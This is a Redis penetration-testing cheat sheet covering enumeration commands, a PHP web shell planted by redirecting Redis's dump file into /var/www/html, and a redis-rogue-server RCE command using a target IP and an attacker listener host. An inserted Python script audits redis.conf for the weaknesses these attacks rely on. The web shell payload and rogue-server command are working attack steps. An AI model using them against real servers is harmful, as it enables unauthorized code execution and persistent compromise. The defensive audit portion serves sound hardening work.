Redis
Redis is an in-memory data structure store used as a database, cache, message broker, and streaming engine.
:: Redis Default Port
6379/TCP
Redis Security
Redis does not try to implement access control; it provides a tiny layer of optional authentication that is turned on by editing the redis.conf file. The system administrator sets the password in clear text inside the redis.conf file.
:: Authenticating in Redis
AUTH <username> <password>
Enumeration
:: Show Database Information
INFO
:: Show Database Configuration
CONFIG GET *
:: Show Connected Clients
client list
PHP Web-Shell
Only possible if we know the path of the website folder.
:: Apache PATH
config set dir /var/www/html
:: Filename
config set dbfilename web_shell.php
:: PAYLOAD
set test "<?php system($_GET['cmd']);?>"
save
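A defender's check for the conditions the Redis Security and PHP Web-Shell sections depend on, as an added example that is not part of the original notes: it audits a redis.conf body for a missing requirepass, listening on all interfaces, protected mode switched off, and a CONFIG command that is still reachable. The finding names, the two sample configs and the function names are constructed for illustration; enable-protected-configs exists only in Redis 7.0 and later, and ACL users are not evaluated.

```python
import shlex

ALL_IFACES = ("0.0.0.0", "::", "*", "::*")

def parse_redis_conf(text):
    """Return {directive: [args, ...]}; directive names are case-insensitive."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # comments only start a line
            continue
        name, *args = shlex.split(line)
        conf.setdefault(name.lower(), []).append(args)
    return conf

def last(conf, key):  # lowercased args of the last occurrence, [] if absent
    return [a.lower() for a in conf[key][-1]] if key in conf else []

def audit(text):
    """Return a sorted list of (hypothetical) finding ids for one config body."""
    conf, findings = parse_redis_conf(text), set()
    if not any(last(conf, "requirepass")):
        findings.add("no-requirepass")
    addrs = [a.lstrip("-") for a in last(conf, "bind")]  # "-" marks optional addrs
    if not addrs or any(a in ALL_IFACES for a in addrs):  # no bind = all interfaces
        findings.add("listens-on-all-interfaces")
    if last(conf, "protected-mode")[:1] == ["no"]:
        findings.add("protected-mode-off")
    renamed = {a[0].lower() for a in conf.get("rename-command", []) if a}
    if "config" not in renamed:  # CONFIG SET dir/dbfilename reachable by name
        findings.add("config-command-not-renamed")
    # Redis 7.0+: dir and dbfilename stay locked unless this is yes/local
    if last(conf, "enable-protected-configs")[:1] in (["yes"], ["local"]):
        findings.add("protected-configs-writable")
    return sorted(findings)

# Constructed sample configs, not taken from a real system
WEAK = '''bind 0.0.0.0
protected-mode no
'''
HARDENED = '''bind 127.0.0.1 -::1
protected-mode yes
requirepass "<long-random-secret>"
rename-command CONFIG ""
'''

if __name__ == "__main__":
    print(audit(WEAK), audit(HARDENED))
```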
Redis Rogue Server
Redis RCE
Works only on versions <= 5.0.5
redis-rogue-server --rhost <TARGET_IP> --lhost <ATTACKER_IP>